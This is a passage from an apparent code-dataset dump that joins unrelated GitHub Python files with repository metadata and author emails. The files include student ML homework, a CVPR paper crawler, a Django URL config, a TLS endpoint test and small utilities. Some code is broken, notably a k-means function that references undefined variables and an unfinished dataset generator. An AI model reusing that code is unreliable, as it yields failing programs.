# Calculate the hinge loss
score_product = (sum(weights[key]*features.get(key, 0) for key in weights))*y
hingeLoss = max(0,1-score_product)
# print("Example: %s , Error: %i " % (x, hingeLoss))
# Compute gradient vector based on value of the hinge loss
if score_product < 1: # Equals phi*y if less than 1
hingeGrad = features
hingeGrad.update((a, b*-1*y) for a, b in features.items())
else: # Zero otherwise
hingeGrad = 0
# Update only if the gradient is nonzero, otherwise
# gradient descent cannot proceed
if hingeGrad != 0:
for feature in hingeGrad.keys():
weights[feature] = weights.get(feature,0) - eta*hingeGrad.get(feature, 0)
# END_YOUR_CODE
return weights
############################################################
# Problem 3c: generate test case
def generateDataset(numExamples, weights):
'''
Return a set of examples (phi(x), y) randomly which are classified correctly by
|weights|.
'''
random.seed(42)
# Return a single example (phi(x), y).
# phi(x) should be a dict whose keys are a subset of the keys in weights
# and values can be anything (randomize!) with a nonzero score under the given weight vector.
# y should be 1 or -1 as classified by the weight vector.
def generateExample():
# BEGIN_YOUR_CODE (our solution is 2 lines of code, but don't worry if you deviate from this)
phi = {}
# END_YOUR_CODE
return (phi, y)
return [generateExample() for _ in range(numExamples)]
############################################################
# Problem 3e: character features
def extractCharacterFeatures(n):
'''
Return a function that takes a string |x| and returns a sparse feature
vector consisting of all n-grams of |x| without spaces.
EXAMPLE: (n = 3) "I like tacos" --> {'Ili': 1, 'lik': 1, 'ike': 1, ...
You may assume that n >= 1.
'''
def extract(x):
# BEGIN_YOUR_CODE (our solution is 6 lines of code, but don't worry if you deviate from this)
# Preprocessing - ignore whitespace
x = x.replace(" ","")
# Pull all ngrams in a zipped form and turn into a list of string grams
ngram_tuple = zip(*[x[i:] for i in range(n)])
ngram_list = ["".join(elem) for elem in ngram_tuple]
features = dict()
# Develop feature vector from grams
for gram in ngram_list:
features[gram] = x.count(gram)
return features
# END_YOUR_CODE
return extract
############################################################
# Problem 4: k-means
############################################################
def kmeans(examples, K, maxIters):
'''
examples: list of examples, each example is a string-to-double dict representing a sparse vector.
K: number of desired clusters. Assume that 0 < K <= |examples|.
maxIters: maximum number of iterations to run (you should terminate early if the algorithm converges).
Return: (length K list of cluster centroids,
list of assignments (i.e. if examples[i] belongs to centers[j], then assignments[i] = j)
final reconstruction loss)
'''
# BEGIN_YOUR_CODE (our solution is 32 lines of code, but don't worry if you deviate from this)
# Initialize the centroids, each one being a random selection
# from the input list examples
random.seed(42)
centroids = []
for k in range(K):
centroids.append(random.choice(examples))
# LOSS - Precalculate the L2-norm squared of featureset
loss_example_norm = 0
for example in examples:
loss_example_norm += sum((example.get(d))**2 for d in example)
# Initialize assignments list and loss storage
loss_centroid_norm = 0
loss_cross_term = 0
assignments = [0 for elem in examples]
assmts_lookup = {k: [] for k in range(len(centroids))}
losses = dict()
num_iters = 0
while num_iters < maxIters:
# Step 1 - Perform the initial assignment of examples to centroids
for i in range(len(examples)):
distances = dict()
for j in range(len(centroids)):
# LOSS - Calculate cross term
loss_cross_term += 2*sum((examples[i].get(d) + centroids[j].get(d)) for d in set(examples[i]) | set(centroids[j]))
distances[j] = sum((examples[i].get(d,0) - centroids[j].get(d,0))**2 for d in set(examples[i]) | set(centroids[j]))
min_centroid = min(distances, key=distances.get)
assignments[i] = min_centroid
# Add the example into the lookup table to speed up the update step
assmts_lookup[min_centroid].append(example)
# Step 2 - Update the centroids using the mean of assigned points
centroids = [dict() for k in range(K)]
for j in range(len(centroids)):
assigned_examples = assmts_lookup[centroids[j]]
# Add up all the dimensions of all the assigned points into the centroid
for assignee in assigned_examples:
for key in assignee.keys():
centroids[j][key] = centroids[j].get(key,0) + assignee[key]
# Make the cluster the centroid of the points by dividing by the number of points
centroids[j].update((a, b/len(assigned_examples)) for a, b in centroids[j].items())
# LOSS - Precalculate L2-norm squared of the centroids squared
loss_centroid_norm += sum((example.get(d))**2 for d in centroids[j])
# LOSS - Combine to form total reconstruction loss for the run
num_iters +=1
losses[num_iters] = loss_example_norm + loss_centroid_norm + loss_cross_term
return centroids, assignments, losses[max(losses)]
# END_YOUR_CODE
| [
"natu.anand@gmail.com"
] | natu.anand@gmail.com |
34e92db0841af367e4b0346a4077887143c981bd | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p00002/s447243661.py | ec5ea4eb25e8b12e086a6e676b80ee789fd3efbc | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | import sys
[print(len(str(sum([int(y) for y in x.split(" ")])))) for x in sys.stdin] | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d6a79a4eabf06bb6b8ca355714e38bdeb0e5ebdd | 59e94c298797d6fa47f22a616ca21ae88d9cd576 | /pgm3.py | c04e50f01c50cefdb247d5193d581eab54317082 | [] | no_license | renisha2898/PythonTraining | e08c70b09f3abacd6e7bd09564608d28476a3570 | 48e352bbdaa3af4d8d0043603cac777de06f3df0 | refs/heads/master | 2023-04-11T21:00:50.139206 | 2021-05-06T14:30:17 | 2021-05-06T14:30:17 | 364,862,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 959 | py | def print_matrix(mat):
for i in range (len(mat)):
for j in range (len(mat)):
print(str(mat[i][j]), end = " ")
print()
def transpose_matrix(mat):
for i in range(len(mat)):
for j in range(i,len(mat)):
mat[i][j], mat[j][i] = mat[j][i],mat[i][j]
def reverse_rows(mat):
for i in range (len(mat)):
k = len(mat) - 1;
for j in range(0,k):
mat[i][j], mat[i][k] = mat[i][k], mat[i][j]
k = k - 1
def reverse_columns(mat):
for i in range (len(mat)):
k = len(mat) - 1;
for j in range(0,k):
mat[j][i], mat[k][i] = mat[k][i], mat[j][i]
k = k - 1
if __name__ == '__main__':
mat = [[1,2,3],
[4,5,6],
[7,8,9]];
print_matrix(mat)
transpose_matrix(mat)
#reverse_rows(mat)
reverse_columns(mat) #(for Anticlockwise rotation)
print("\nThe array after rotation is ")
print_matrix(mat)
| [
"renisha.barnes22309@gmail.com"
] | renisha.barnes22309@gmail.com |
a7ab71ff7fc64ee39fb77ab6387a4743f11aebc9 | 7f86ec2cb6cf59e8a70ac2855b6e073adad8ec5a | /cvpr_crawler.py | 69351ae13ef9099fd9fdc910a724958697154184 | [] | no_license | wangjuenew/CVPR2019 | 3e52dd37eea9ef99c796ba1c1676f4f3b5705255 | f6777150bab76c67245c63afad25c6b9b2819fc1 | refs/heads/master | 2020-06-05T14:44:16.401270 | 2019-06-11T07:34:15 | 2019-06-11T07:34:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | import requests
from bs4 import BeautifulSoup
import os
headers={
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
}
url="http://openaccess.thecvf.com/CVPR2019.py"
html=requests.get(url)
soup=BeautifulSoup(html.content)
soup.a.contents=='pdf'
pdfs=soup.findAll(name="a",text="pdf")
if not os.path.exists('./CVPR2019/'):
os.mkdir('./CVPR2019/')
folder_path='./CVPR2019/'
for i,pdf in enumerate(pdfs):
pdf_name=pdf["href"].split('/')[-1]
c=requests.get('http://openaccess.thecvf.com/'+pdf['href'],headers=headers).content
with open(folder_path+pdf_name,mode="wb") as f:
f.write(c)
print('['+str(i)+']'+pdf_name+" finish")
| [
"noreply@github.com"
] | noreply@github.com |
f22e73da9c3bc06e6fbce6048458ec5cce2dbf73 | 77d4bedc8e58083e523b600a04efc1d7b990ad5e | /goods/goods/spiders/jiazhuangpei.py | cb2910f3e3d1dee7a6acb758d6ac44a07d5cd875 | [] | no_license | Yongest/spider | 7ef42675f4680fd86ad0e9b3a7ee97c51ad022a5 | aae715dc1793d70326679e4e0766f813d2932ef5 | refs/heads/main | 2023-06-04T20:53:43.989894 | 2021-06-23T10:07:45 | 2021-06-23T10:07:45 | 357,281,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | import scrapy
class JiazhuangpeiSpider(scrapy.Spider):
name = 'jiazhuangpei'
allowed_domains = ['jiazhuangpei.com']
start_urls = ['https://www.jiazhuangpei.com/combo/combo_list?type_id=1&page=1']
print('start')
def parse(self, response):
print(22)
node_list = response.xpath('//*/div')
print(node_list)
| [
"1046788379@qq.com"
] | 1046788379@qq.com |
29508b8c62c4dfc7ece26c6ae621b64c84e7d5da | 1368e2beda67052140a51fd53eb7a12941124320 | /Python 3/1541.py | 72fe04dada81de5994973cd36cbc76aecd070127 | [] | no_license | matheuskolln/URI | ac540fd4ea18c9b3ba853492dc60157c165145cf | b9091ed1c5b75af79cb25827aff8aab99d2e4b65 | refs/heads/master | 2023-03-09T23:17:17.865447 | 2021-02-25T16:47:24 | 2021-02-25T16:47:24 | 272,043,082 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | while True:
n = [int(x) for x in input().split(' ')]
if n[0] == 0:
break
a = n[0] * n[1]
i = 0
while i * i * n[2] / 100 <= a:
i += 1
print(i - 1) | [
"matheuzhenrik@gmail.com"
] | matheuzhenrik@gmail.com |
de86bd936a9bc7afa59da85369c6a2c0b220a168 | f8ffa8ff257266df3de9d20d95b291e393f88434 | /Python from scratch/Zadania/zadania podczas zajęć/zajęcia11/zadanie01/zadanie01+a.py | ac892bb38f756545548af1328c3d3f7cef2f15c5 | [] | no_license | janiszewskibartlomiej/Python_Code_Me_Gda | c0583c068ef08b6130398ddf93c3a3d1a843b487 | 7568de2a9acf80bab1429bb55bafd89daad9b729 | refs/heads/master | 2020-03-30T05:06:26.757033 | 2020-03-02T08:53:28 | 2020-03-02T08:53:28 | 150,781,356 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | from datetime import datetime
data_urodzenia = input('Wprowadź datę urodzin celebryty w formacie [RRRR-MM-DD]:')
try:
konwertowanie_daty = datetime.strptime(data_urodzenia, '%Y-%m-%d')
except ValueError:
print('Wprowadzono nie prawiłowe dane!')
exit()
teraz = datetime.now()
wiek_celebryty = teraz - konwertowanie_daty
print('Wiek celebryty to:', wiek_celebryty.days // 365)
| [
"janiszewski.bartlomiej@gmail.com"
] | janiszewski.bartlomiej@gmail.com |
9f594ff1823619e1dcc2332a99bfe096916918e4 | 46d99d9323e76d621ca96267a110ad504862b3ae | /oauth2discord/oauth2discord/urls.py | d0d031dc18f0be1182806830b8496f5fab51af8b | [] | no_license | stuyy/django-discord-oauth2 | 532671b9d96fd51aea95baff97edea3c51a45080 | 990f2a92151f1bbe90dfcb5ca05fdb16afbebefc | refs/heads/master | 2023-02-06T01:25:20.436809 | 2020-12-23T13:43:12 | 2020-12-23T13:43:12 | 323,912,487 | 8 | 5 | null | null | null | null | UTF-8 | Python | false | false | 1,079 | py | """oauth2discord URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from discordlogin import views
urlpatterns = [
path('admin/', admin.site.urls),
path('auth/user', views.get_authenticated_user, name='get_authenticated_user'),
path('oauth2', views.home, name='oauth2'),
path('oauth2/login', views.discord_login, name='oauth_login'),
path('oauth2/login/redirect', views.discord_login_redirect, name='discord_login_redirect')
]
| [
"ansontheprogrammer@gmail.com"
] | ansontheprogrammer@gmail.com |
0e17514ae9c3a31e17cccfa8e0dddb6f3ce2a800 | 33648419977a4fba65b759eb3a2a974403298340 | /double_lens/dependencies.py | c2aab79bcd0146e47ddd160e3b09961bac6aeb2f | [] | no_license | Andrew-wi/magnetic_lens | 3c3cbd2c5b821f4f43d7b562afbab6610f3d9608 | efe51168018c5e4c9c2055416dc47c3694af448b | refs/heads/master | 2023-05-23T10:00:08.998982 | 2021-06-15T18:05:32 | 2021-06-15T18:05:32 | 262,870,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,274 | py | # ----------------------------------------------------------------------------
# Dependencies
# ----------------------------------------------------------------------------
print('Importing dependencies...')
import csv
import datetime
import gc
import matplotlib.pyplot as plt
import matplotlib.path as pltPath
import math
import numpy as np
from astropy.io import fits
from mpl_toolkits import mplot3d
from pathlib import Path
# from scipy.stats import maxwell
n = 1e4
t = 0.0
sigma_xy = 0.0042
sigma_vxy = 12.0
sigma_vz = 30.0
mu_vz = 100.0
l_cell_to_4k = 0.1
l_4k_to_lens_aperture = 0.05 # origin is at l_cell_to_4k. Can be negative to scan behind the 4k
l_4k_to_lens_aperture_2 = 0.08 # as above
l_4k_to_beam_shutter = 0.26
m_s = 0.5
g = 2.0
mu_B = 9.274e-24
mass = 9.48671e-26 # caoh mass # 1.18084e-25 # caoch3 mass
t_final = 0.01
steps = 3000
mot_left_edge = 0.6700
mot_side_length = 0.01
# parameter scan variables
lens_range = 0.5 # range of values over which we scan the lens. Origin is at l_4k_to_lens_aperture
scan_points = 9 # number of points to scan
trials = 12 # number of trials at each scan_point
# same as in mathematica code
m = 200 # mesh spacing
R = 25.4 # outer radius of lens (in mm, as Radia is in mm by default)
segs = 12 # number of segments
| [
"andrew.winnicki.sc@gmail.com"
] | andrew.winnicki.sc@gmail.com |
79ea37acde76ff9d7597da6fefc1e622c6d6b78f | d51655c40bf6ccb6a1d380ad9a41787c39c0dd73 | /01_simple_forecast.py | 41ce5d89994d1b5b4bdddae9012dbfc12cf90205 | [] | no_license | andydong1209/TaipeiUniv | afda0cea0c099220ad2bf476b43f3c70f7cfeeb5 | 850e91c7ce536218a9363c9e533aeb28be4a4595 | refs/heads/master | 2020-04-09T08:47:46.540602 | 2018-12-03T15:04:43 | 2018-12-03T15:04:43 | 160,208,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,334 | py | # persistence forecast for monthly car sales dataset
from math import sqrt
from numpy import median
from numpy import mean
from numpy import std
from pandas import read_csv
from sklearn.metrics import mean_squared_error
from matplotlib import pyplot
# split a univariate dataset into train/test sets
def train_test_split(data, n_test):
return data[:-n_test], data[-n_test:]
# root mean squared error or rmse
def measure_rmse(actual, predicted):
return sqrt(mean_squared_error(actual, predicted))
# difference dataset
def difference(data, interval):
return [data[i] - data[i - interval] for i in range(interval, len(data))]
# fit a model
def model_fit(train, config):
return None
# forecast with a pre-fit model
def model_predict(model, history, config):
values = list()
for offset in config:
values.append(history[-offset])
return median(values)
# walk-forward validation for univariate data
def walk_forward_validation(data, n_test, cfg):
predictions = list()
# split dataset
train, test = train_test_split(data, n_test)
# fit model
model = model_fit(train, cfg)
# seed history with training dataset
history = [x for x in train]
# step over each time-step in the test set
for i in range(len(test)):
# fit model and make forecast for history
yhat = model_predict(model, history, cfg)
# store forecast in list of predictions
predictions.append(yhat)
# add actual observation to history for the next loop
history.append(test[i])
# estimate prediction error
error = measure_rmse(test, predictions)
print(' > %.3f' % error)
return error
# repeat evaluation of a config
def repeat_evaluate(data, config, n_test, n_repeats=30):
# fit and evaluate the model n times
scores = [walk_forward_validation(data, n_test, config) for _ in range(n_repeats)]
return scores
# summarize model performance
def summarize_scores(name, scores):
# print a summary
scores_m, score_std = mean(scores), std(scores)
print('%s: %.3f RMSE (+/- %.3f)' % (name, scores_m, score_std))
# box and whisker plot
pyplot.boxplot(scores)
pyplot.show()
series = read_csv('monthly-car-sales.csv', header=0, index_col=0)
data = series.values
# data split
n_test = 12
# define config
config = [12, 24, 36]
# grid search
scores = repeat_evaluate(data, config, n_test)
# summarize scores
summarize_scores('persistence', scores)
| [
"noreply@github.com"
] | noreply@github.com |
4e2e2454f366b4ccf2365d6b99b0d14541f8eec0 | bd1da92cc915c6093ced6fe03f0bcd581906d3dd | /tests/integrationv2/test_well_known_endpoints.py | 2ff96377720d5ec10f6de008e91b8f182dad8957 | [
"MIT",
"Apache-2.0"
] | permissive | JRetza/s2n | f177c0534e751ad7f39f0c16cdc7a2a5849e3b40 | 0df8de3c5630357ed25b935a5978c63f49bb4108 | refs/heads/main | 2023-01-03T11:36:43.297765 | 2020-10-09T21:05:11 | 2020-10-09T21:05:11 | 303,068,948 | 1 | 0 | Apache-2.0 | 2020-10-11T07:47:24 | 2020-10-11T07:47:23 | null | UTF-8 | Python | false | false | 2,683 | py | import copy
import os
import pytest
from constants import TRUST_STORE_BUNDLE
from configuration import available_ports, PROTOCOLS
from common import ProviderOptions, Protocols, Ciphers
from fixtures import managed_process
from global_flags import get_flag, S2N_NO_PQ, S2N_FIPS_MODE
from providers import Provider, S2N
from utils import invalid_test_parameters, get_parameter_name
ENDPOINTS = [
{"endpoint": "amazon.com"},
{"endpoint": "facebook.com"},
{"endpoint": "google.com"},
{"endpoint": "netflix.com"},
{"endpoint": "s3.amazonaws.com"},
{"endpoint": "twitter.com"},
{"endpoint": "wikipedia.org"},
{"endpoint": "yahoo.com"},
]
if get_flag(S2N_NO_PQ, False) is False:
# If PQ was compiled into S2N, test the PQ preferences against KMS
pq_endpoints = [
{
"endpoint": "kms.us-east-1.amazonaws.com",
"cipher_preference_version": Ciphers.KMS_PQ_TLS_1_0_2019_06,
"expected_cipher": "ECDHE-BIKE-RSA-AES256-GCM-SHA384"
},
{
"endpoint": "kms.us-east-1.amazonaws.com",
"cipher_preference_version": Ciphers.PQ_SIKE_TEST_TLS_1_0_2019_11,
"expected_cipher": "ECDHE-SIKE-RSA-AES256-GCM-SHA384"
}
]
ENDPOINTS.extend(pq_endpoints)
# Wikipedia still fails when connecting from the codebuild images
expected_failures = [
'wikipedia.org'
]
@pytest.mark.uncollect_if(func=invalid_test_parameters)
@pytest.mark.parametrize("protocol", PROTOCOLS, ids=get_parameter_name)
@pytest.mark.parametrize("endpoint", ENDPOINTS, ids=lambda x: "{}-{}".format(x['endpoint'], x.get('cipher_preference_version', 'Default')))
def test_well_known_endpoints(managed_process, protocol, endpoint):
port = "443"
client_options = ProviderOptions(
mode=Provider.ClientMode,
host=endpoint['endpoint'],
port=port,
insecure=False,
client_trust_store=TRUST_STORE_BUNDLE,
protocol=protocol)
if get_flag(S2N_FIPS_MODE) is True:
client_options.client_trust_store = "../integration/trust-store/ca-bundle.trust.crt"
else:
client_options.client_trust_store = "../integration/trust-store/ca-bundle.crt"
if 'cipher_preference_version' in endpoint:
client_options.cipher = endpoint['cipher_preference_version']
client = managed_process(S2N, client_options, timeout=5)
for results in client.get_results():
if results.exception is not None or results.exit_code != 0:
assert endpoint['endpoint'] in expected_failures
if 'expected_cipher' in endpoint:
assert bytes(endpoint['expected_cipher'].encode('utf-8')) in results.stdout
| [
"noreply@github.com"
] | noreply@github.com |
8bbc7b4b428f5449c80ea5148865efc952e1484e | c10abab7156cd0d7fc2f55f66ab24066f42c0498 | /TrainSetGenerate/mv_correct_info.py | 7bf33cb56c7ff8b8a64ebd786c04c0a899a4c9c3 | [] | no_license | doubiiot/Text-Extraction-System-of-Business-Information-Pictures-in-Online-Stores | c0a14eaa6e0b7f72beb575c9abbb5455c43cd286 | 79c05d17ad012b8adce3769e7b78eacc65538ad1 | refs/heads/master | 2020-04-14T02:41:46.219746 | 2018-12-30T13:37:29 | 2018-12-30T13:37:29 | 163,589,307 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,528 | py | import pickle
import shutil
import os
def get_dic():
f = open('./label_name', 'r')
num = 0
dic = {}
for i in f.read()[0:-1]:
dic[num] = i
num = num + 1
return dic
def read_pickle():
f = open('./chinese_labels', 'rb')
dic = pickle.load(f)
print(dic)
def find_loc(tmp):
dic = get_dic()
for key, value in dic.items():
if(value == tmp):
#print(str(tmp + " folder is " + str(key)))
break
return key
if __name__ == "__main__":
#generate_pickle()
path = "/home/nansang/Desktop/correct2"
target_path = "/home/nansang/Desktop/workspace/train/dataset/train"
read_pickle()
for dirpath, dirnames, filenames in os.walk(path):
#print(dirnames)
for i in dirnames:
print(i)
loc = find_loc(i)
path_orignal = os.path.join(path,str(i))
path_files = os.path.join(target_path,str(loc).zfill(5))
for file_correct in os.listdir(path_orignal):
tmp_file = i + "/" + file_correct
src_file = os.path.join(path,tmp_file) #original file to move
dst_file = os.path.join(path_files,file_correct)
#print("src file is : " + str(src_file))
print("dst file is : " + str(dst_file))
#print("dst folder is : " + str(path_files))
if not os.path.exists(path_files):
os.makedirs(path_files)
shutil.copyfile(src_file,dst_file)
| [
"757282406@qq.com"
] | 757282406@qq.com |
944b07c373aec8167deeb8dc6bfdbe084937b546 | 50aaf7a32228fd29c53fbe59dda51253b308ebfb | /trading/model_runner_thread.py | bb7add2474e3d2bdc961d6bcf1ca438fc94fadbd | [] | no_license | xnsua/--pystock | 7300b35ecd9fad0e035ab58c91592739d94212cf | d1d414624b316b5fb01d02f99efa79a07eef5d53 | refs/heads/master | 2020-04-09T04:22:00.780773 | 2018-12-02T06:18:25 | 2018-12-02T06:18:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,298 | py | from common.alert import message_box_error
from project_config.logbook_logger import mylog
from trading.base_structure.trade_constants import MsgPushRealTimePrice, MsgQuitLoop, MsgBidOver
from trading.base_structure.trade_message import TradeMessage
from trading.models.abstract_model import AbstractModel
from trading.trade_context import TradeContext
class ModelRunnerThread:
def __init__(self, trade_context: TradeContext, model: AbstractModel):
assert not hasattr(trade_context.thread_local, 'name')
trade_context.thread_local.name = model.name()
self.trade_context = trade_context
self.model = model
self.self_queue = trade_context.current_thread_queue
self.model.init_model(trade_context)
def run_loop(self):
mylog.debug(f'Model: {self.model.name()} ........')
while True:
msg = self.self_queue.get() # type: TradeMessage
if isinstance(msg.operation, MsgBidOver):
self.model.on_bid_over()
elif isinstance(msg.operation, MsgPushRealTimePrice):
self.model.handle_bar()
elif isinstance(msg.operation, MsgQuitLoop):
return
else:
message_box_error('Unknown message operation: ', msg.operation)
| [
"cqhme@outlook.com"
] | cqhme@outlook.com |
288832b4e21767a5fe146fc0d0ad0218ce3730fc | be55991401aef504c42625c5201c8a9f14ca7c3b | /python全栈3期/面向对象/继承顺序.py | dcb0234f6de6831c86a781efdb3753c1b0f99ed8 | [
"Apache-2.0"
] | permissive | BillionsRichard/pycharmWorkspace | adc1f8bb15b58ded489fc8dec0df397601823d2c | 709e2681fc6d85ff52fb25717215a365f51073aa | refs/heads/master | 2021-09-14T21:12:59.839963 | 2021-08-08T09:05:37 | 2021-08-08T09:05:37 | 143,610,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | """
广度优先: 新式类(Python3) F->D->B->E->C->A
深度优先: 经典类(python2,不继承自object类)F->D->B->A->E->C
A
| \
B C
| \
D E
\ /
\/
F
"""
from pprint import pprint as pp
class A:
def test(self):
print('A')
class B(A):
def test(self):
print('B')
pass
class C(A):
def test(self):
print('C')
class D(B):
pass
# def test(self):
# print('D')
class E(C):
def test(self):
print('E')
pass
class F(D, E):
pass
# def test(self):
# print('F')
f1 = F()
f1.test()
pp(F.__mro__)
| [
"295292802@qq.com"
] | 295292802@qq.com |
de407b057a3f07ac7af93c6c6aeb6aa4ef3eed6f | 9c224a0bd205b0140942c082dc68a10450638307 | /find_cms/cms_model.py | f47b4c8b7f57991f4a7075e76e68b2268aead399 | [] | no_license | Binye234/What_Cms_Auto_Poc | 195023be44c784ba44f92de7e344c5a56db152ae | 56cae28bfecfe3032efe6578c3f571e5de21a3e9 | refs/heads/master | 2022-06-06T16:16:19.366767 | 2020-05-04T07:04:34 | 2020-05-04T07:04:34 | 257,018,990 | 30 | 5 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | # -*- coding: utf-8 -*-
class Cms_Model:
def __init__(self):
'''cms模型,记录各种参数'''
self.name = ""
self.url = ""
self.type=None
#self.flag
| [
"281564214@qq.com"
] | 281564214@qq.com |
77edf0789727527c8878b7240ecef57928ad998f | c5ea6a0b2d5f641b99414c3de87b60287feee3f8 | /ll_env/bin/django-admin.py | 10f7a05f30fae4202476fefdd5854038d5bac0c7 | [] | no_license | arif-hstu/django_blogsite | a78f303661d203080337c38d3e96a2ed295572be | 3ebd113600e6f6c3d65139268ea058364a4e0eac | refs/heads/main | 2023-03-09T04:23:55.468492 | 2021-02-16T19:19:02 | 2021-02-16T19:19:02 | 339,488,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | #!/home/arif/django_practice/ll_env/bin/python3
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"arif.dvm.hstu@gmail.com"
] | arif.dvm.hstu@gmail.com |
44793d5b5d5e8036980f789ec25d1f35af432398 | f649451bde3c1ceebe36fde242099618ec7dcf61 | /mojo-py/mojoland/recipes/gbm/eyestate_gbm_recipe.py | 7c3f2f7162bb366d2c6ef296412611c73d84dd62 | [] | no_license | h2oai/mojoland | aa1860881d1ee04ce57a3f4531a9a7022fb22a84 | aee15bcd7df195e0f1a3ed193aaad9728a7c43dd | refs/heads/master | 2023-08-25T08:46:26.343909 | 2022-09-01T16:14:23 | 2022-09-01T16:14:23 | 72,937,745 | 1 | 1 | null | 2021-11-10T16:00:03 | 2016-11-05T16:14:33 | Python | UTF-8 | Python | false | false | 643 | py | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from typing import Iterator, List
from h2o.estimators import H2OGradientBoostingEstimator
from ..datasets import eyestate_frame, eyestate_data
from ..baserecipe import BaseRecipe
class EyestateGbmRecipe(BaseRecipe):
"""Binomial model, all features are numeric."""
def bake(self) -> H2OGradientBoostingEstimator:
fr = eyestate_frame()
model = H2OGradientBoostingEstimator(ntrees=100, distribution="bernoulli")
model.train(y="eyeDetection", training_frame=fr)
return model
def source(self) -> Iterator[List[str]]:
return eyestate_data()
| [
"pasha@h2o.ai"
] | pasha@h2o.ai |
f84d26d4e28de6fdda8bf0cdc36b0aa4ce4351a4 | 773d1efcbdb1bb1c4e0ade1cc1f0778a9d0aa99e | /tasks/AbramyanPartI/begin/begin23.py | 75bf082165fb19c20f8e05d6af8bda763936548a | [] | no_license | a-kikin/learningPython | f73ef5901b8ed85f1e6ddd9adc72723093acaf5d | c4e1a0541903f995ad86e095f99b646422753206 | refs/heads/master | 2020-04-01T20:12:31.522296 | 2018-11-13T08:10:23 | 2018-11-13T08:10:23 | 153,593,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69 | py | a = 2
b = 4
c = 7
d = a
a = b
b = c
c = d
print(a, b, c)
| [
"a-kikin@yandex-team.ru"
] | a-kikin@yandex-team.ru |
d20ec4b9e3cdfff3d33a0db66cb8dd016d72d0b1 | d34a3cebc6d3153f6492d5c9cc1ed3d01bd507a2 | /Homework 2/models/icons.py | 66cf26e15bd4e3153b452f170d5b2eaae86fda2f | [
"LicenseRef-scancode-public-domain"
] | permissive | asilva3/CMPS183 | 9fde2e50ce4cd79af481ee33c1e1fa294bf2e60f | 5ae0d66fc30fcae3bdb9dfa018ec3b5746c5f4f2 | refs/heads/master | 2021-05-04T11:02:27.391152 | 2016-08-25T17:13:42 | 2016-08-25T17:13:42 | 45,205,556 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | icon_shop = I(_class='fa fa-star')
icon_read = I(_class='fa fa-thumbs-up')
icon_noread = I(_class='fa fa-thumbs-down') | [
"asilva3@ucsc.edu"
] | asilva3@ucsc.edu |
2b82eda9ca0ac693fc27d54ea6d80342e9506926 | d1706d1054d0f497e549dbeb8108bdb4b71d6514 | /protocol.py | f7229a9c28991806417214ee8d4c1e1028dc5464 | [] | no_license | isaac-ped/cis800 | c35cf46360a15c6bafe9322bc87dc3c3c7a051ba | f45a1195928c8aa8d96be028d57a382fba4d9b26 | refs/heads/master | 2020-04-08T20:13:43.962684 | 2018-12-04T08:15:59 | 2018-12-04T08:15:59 | 159,689,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,169 | py | import ctypes as ct
class Udp(ct.Structure):
_fields_ = [("usrc", ct.c_ushort),
("udst", ct.c_ushort),
("ulen", ct.c_ushort),
("uchk", ct.c_ushort)]
class Eth(ct.Structure):
_fields_ = [("edst", ct.c_char * 6),
("esrc", ct.c_char * 6),
("eproto", ct.c_ushort)]
class Ip4(ct.Structure):
_fields_ = [("iverihn", ct.c_char),
("idscpecn", ct.c_char),
("ilen", ct.c_ushort),
("iid", ct.c_ushort),
("iflgfrag", ct.c_ushort),
("ittl", ct.c_char),
("iproto", ct.c_char),
("ichk", ct.c_ushort),
("isrc", ct.c_char * 4),
("idst", ct.c_char * 4)]
class Mcd(ct.Structure):
_fields_ = [("id", ct.c_ushort),
("seq", ct.c_ushort),
("tot", ct.c_ushort),
("zero", ct.c_ushort)]
class Hdr(ct.Structure):
_fields_ = Udp._fields_ + Eth._fields_ + Ip4._fields_ + Mcd._fields_
def as_hex(ptr, typ):
st = ct.string_at(ptr, ct.sizeof(typ))
return ":".join(c.encode('hex') for c in st)
| [
"iped@seas.upenn.edu"
] | iped@seas.upenn.edu |
f297dde3e24a29cede6a18efcb18439969ce8aba | 7e0e22e31aafc7eecda9d62ae4329f8697e23d40 | /scripts/average | 90f6be281641d653f9fe748d36aef7067a7f810b | [
"MIT"
